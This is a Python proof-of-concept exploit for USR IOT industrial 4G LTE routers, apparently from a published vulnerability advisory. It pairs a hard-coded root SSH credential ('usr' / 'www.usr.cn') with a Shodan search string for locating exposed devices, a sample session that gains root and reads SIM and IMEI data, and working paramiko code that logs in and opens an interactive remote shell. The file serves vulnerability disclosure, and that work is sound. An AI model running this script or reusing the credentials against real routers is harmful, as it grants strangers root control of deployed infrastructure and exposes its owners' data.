#!/usr/bin/env python3
#
#
# USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 Remote Root Backdoor
#
#
# Vendor: Jinan USR IOT Technology Limited
# Product web page: https://www.pusr.com | https://www.usriot.com
# Affected version: 1.0.36 (USR-G800V2, USR-G806, USR-G807, USR-G808)
#                   1.2.7 (USR-LG220-L)
#
# Summary: USR-G806 is an industrial 4G wireless LTE router which provides
# a solution for users to connect their own devices to the 4G network via a
# WiFi interface or an Ethernet interface. USR-G806 adopts a high-performance
# embedded CPU which supports a 580MHz working frequency and can be widely
# used in Smart Grid, Smart Home, public bus and vending machine deployments
# for high-speed data transmission. USR-G806 supports various functions such
# as APN card, VPN, WIFIDOG and flow control, and has many advantages
# including high reliability, simple operation and a reasonable price.
# USR-G806 supports WAN, LAN, WLAN and 4G interfaces and provides various
# networking modes to help users establish their own network.
#
# Desc: The USR IOT industrial router is vulnerable to hard-coded credentials
# within its Linux distribution image. These credentials are never exposed
# to the end-user and cannot be changed through any normal operation of the
# device. The 'usr' account with password 'www.usr.cn' has the highest
# privileges on the device (it is uid 0, as the session below shows). The
# password is also the default WLAN password. Because the account cannot be
# removed or re-keyed from the device's own interface, a practical workaround
# until a fixed firmware ships is to keep the device's SSH service (TCP/2222
# in the tested build) off untrusted networks.
# Shodan Dork: title:"usr-*" // 4,648 ed ao 15042022
#
# -------------------------------------------------------------------------
# lqwrm@metalgear:~$ python usriot_root.py 192.168.0.14
#
# --Got rewt!
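# # id;id root;pwd
# uid=0(usr) gid=0(usr)
# uid=2(root) gid=2(root) groups=2(root)
# /root
#
# # crontab -l
# */2 * * * * /etc/ltedial
# */20 * * * * /etc/init.d/Net_4G_Check.sh
# */15 * * * * /etc/test_log.sh
# */120 * * * * /etc/pddns/pddns_start.sh start &
# 44 4 * * * /etc/init.d/sysreboot.sh &
# */5 * * * * ps | grep "/usr/sbin/ntpd" && /etc/init.d/sysntpd stop;
# 0 */4 * * * /etc/init.d/sysntpd start; sleep 40; /etc/init.d/sysntpd stop;
# cat /tmp/usrlte_info
# Local time is Fri Apr 15 05:38:56 2022
# (loop)
# IMEI Number:8*************1
# Operator information:********Telecom
# signal intensity:normal(20)
#
# Software version number:E*****************G
# SIM Card CIMI number:4*************7
# SIM Card number:8******************6
# Short message service center number:"+8**********1"
# system information:4G Mode
# PDP protocol:"IPV4V6"
# CREG:register
# Check ME password:READY
# base station information:"4**D","7*****B"
# cat /tmp/usrlte_info_imsi
# 4*************7
#
# exit
#
# lqwrm@metalgear:~$
# -------------------------------------------------------------------------
#
# Tested on: GNU/Linux 3.10.14 (mips)
#            OpenWrt/Linaro GCC 4.8-2014.04
#            Ralink SoC MT7628 PCIe RC mode
#            BusyBox v1.22.1
#            uhttpd
#            Lua
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2022-5705
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5705.php
#
#
# 10.04.2022
#

import sys

import paramiko

BANNER = '''▄• ▄▌.▄▄ · ▄▄▄ ▪ ▄▄▄▄▄ █▪██▌▐█ ▀. ▀▄ █·██ ▪ •██ █▌▐█▌▄▀▀▀█▄▐▀▀▄ ▐█· ▄█▀▄ ▐█.▪ ▐█▄█▌▐█▄▪▐█▐█•█▌▐█▌▐█▌.▐▌ ▐█▌· ▄▄▄▄· ▄▄▄·▀ ▄▄·▀▄ •▄ ·▄▄▄▄ ▀█▄▀▪ ▀▀▀ ▄▄▄ ▐█ ▀█▪▐█ ▀█ ▐█ ▌▪█▌▄▌▪██▪ ██ ▪ ▪ ▀▄ █· ▐█▀▀█▄▄█▀▀█ ██ ▄▄▐▀▀▄·▐█· ▐█▌ ▄█▀▄ ▄█▀▄ ▐▀▀▄ ██▄▪▐█▐█ ▪▐▌▐███▌▐█.█▌██. ██ ▐█▌.▐▌▐█▌.▐▌▐█•█▌ ·▀▀▀▀ ▀ ▀ ▄▄▄▀ ·▀ ▀▀▀▀▀▀• ▄▄▄▄▄▪ ▀█▄▀▪.▀ ▀ ▀▄ █·▪ ▪ •██ ▐▀▀▄ ▄█▀▄ ▄█▀▄ ▐█.▪ ▐█•█▌▐█▌.▐▌▐█▌.▐▌ ▐█▌· ▄▄▄·▀ ▄▄·▀█▄▄· ▄▄▄▀..▄▄▀· .▄▄ · ▐█ ▀█ ▐█ ▌▪▐█ ▌▪▀▄.▀·▐█ ▀. ▐█ ▀. 
▄█▀▀█ ██ ▄▄██ ▄▄▐▀▀▪▄▄▀▀▀█▄▄▀▀▀█▄ ▐█ ▪▐▌▐███▌▐███▌▐█▄▄▌▐█▄▪▐█▐█▄▪▐█ ▀ ▀ ·▀▀▀ ·▀▀▀ ▀▀▀ ▀▀▀▀ ▀▀▀▀ '''

# Hard-coded backdoor account shipped in the firmware image (see advisory header).
DEFAULT_USER = 'usr'
DEFAULT_PASS = 'www.usr.cn'
# The original PoC connected to 2222; its inline note "22 Ook." suggests the
# service may also answer on 22 on some builds -- confirm per device.
DEFAULT_PORT = 2222
# Upper bound on TCP connect / SSH banner / auth wait, so an unreachable or
# filtered host fails with a clear error instead of hanging forever.
CONNECT_TIMEOUT = 10.0


def connect(host, port=DEFAULT_PORT, username=DEFAULT_USER,
            password=DEFAULT_PASS, timeout=CONNECT_TIMEOUT):
    """Open an SSH session to *host* using the hard-coded credentials.

    Args:
        host: IP address or hostname of the router.
        port: TCP port of the router's sshd.
        username / password: credentials to present (defaults: the backdoor).
        timeout: seconds to wait for connect, banner and authentication.

    Returns:
        A connected ``paramiko.SSHClient``; the caller owns it and must close it.

    Raises:
        paramiko.AuthenticationException: the device rejected the credentials,
            i.e. the backdoor account is gone or the password was changed.
        OSError, paramiko.SSHException: transport-level failure (host down,
            port closed/filtered, timeout, host-key problem).
    """
    client = paramiko.SSHClient()
    # The target's host key is unknown in advance, so accepting whatever it
    # presents is deliberate for a PoC. It also means the session is trivially
    # MITM-able; do not copy this policy into tooling that carries secrets.
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(
        host,
        port=port,
        username=username,
        password=password,
        timeout=timeout,
        banner_timeout=timeout,
        auth_timeout=timeout,
        # Never offer the operator's own agent keys / ~/.ssh keys to the
        # target: the device is hostile and would otherwise learn them.
        allow_agent=False,
        look_for_keys=False,
    )
    return client


def run_command(client, cmd):
    """Execute *cmd* on the device and return its merged stdout+stderr as text.

    stderr is merged into stdout on the channel: reading stdout to EOF before
    touching stderr can stall when a command writes a lot to stderr, because
    both streams share one channel window. Undecodable bytes are replaced
    rather than raising, since BusyBox output is not guaranteed to be UTF-8.
    """
    chan = client.get_transport().open_session()
    try:
        chan.set_combine_stderr(True)
        chan.exec_command(cmd)
        return chan.makefile('rb').read().decode(errors='replace').strip()
    finally:
        chan.close()


def shell(client):
    """Minimal interactive loop: prompt, run the line on the device, print output.

    Ends on the literal command ``exit`` or on EOF (Ctrl-D). The client is
    always closed on the way out, including on Ctrl-C.
    """
    try:
        while True:
            try:
                cmd = input('# ')
            except EOFError:
                break
            if cmd == 'exit':
                break
            output = run_command(client, cmd)
            if output:
                print(output)
    finally:
        client.close()


def main(argv=None):
    """Entry point: ``usriot_root.py <ip> [port]``.

    Returns 0 on a clean run (including the usage message, as the original
    script did) and 1 when the device could not be reached or rejected the
    backdoor credentials.
    """
    argv = sys.argv[1:] if argv is None else argv
    print(BANNER)
    if not argv:
        print('--Gief me an IP.')
        return 0
    host = argv[0]
    port = int(argv[1]) if len(argv) > 1 else DEFAULT_PORT
    try:
        client = connect(host, port)
    except paramiko.AuthenticationException:
        # Only an explicit auth rejection means the account is gone; anything
        # else (timeout, refused, filtered) is reported separately so the
        # operator does not mistake a network problem for a patched device.
        print('--Backdoor removed.')
        return 1
    except (OSError, paramiko.SSHException) as exc:
        print(f'--Could not reach {host}:{port}: {exc}')
        return 1
    print('--Got rewt!')
    shell(client)
    return 0


if __name__ == '__main__':
    sys.exit(main())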